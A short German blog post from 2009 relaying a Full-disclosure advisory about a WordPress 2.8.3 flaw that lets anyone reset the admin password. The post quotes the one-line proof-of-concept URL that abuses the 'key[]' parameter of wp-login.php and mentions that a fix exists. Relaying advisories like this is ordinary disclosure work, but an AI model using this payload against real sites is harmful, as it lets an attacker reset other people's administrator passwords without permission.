Guymon » Lücke in WordPress

Stoppt die Vorratsdatenspeicherung! Jetzt klicken &handeln!

Willst du auch an der Aktion teilnehmen? Hier findest du alle relevanten Infos und Materialien:

You are reading

August 11, 2009
Tags Security, wordpress.
No comments yet
Lücke in WordPress

Lücke in WordPress

Gerade bei Full-disclosure gelesen: WordPress < = 2.8.3 Remote admin reset password

IV. PROOF OF CONCEPT
————————————-
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http ://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
The password will be reset without any confirmation.

Glücklicherweise gibt es bereits einen Fix für das Problem.

Possibly related posts (automatically generated)

Self Optimizing Links

Comments are closed

Copyright © 2004–2009. All rights reserved. – Impressum

RSS Feed. This blog is proudly powered by Wordpress and uses Modern Clix, a theme by Rodrigo Galindez.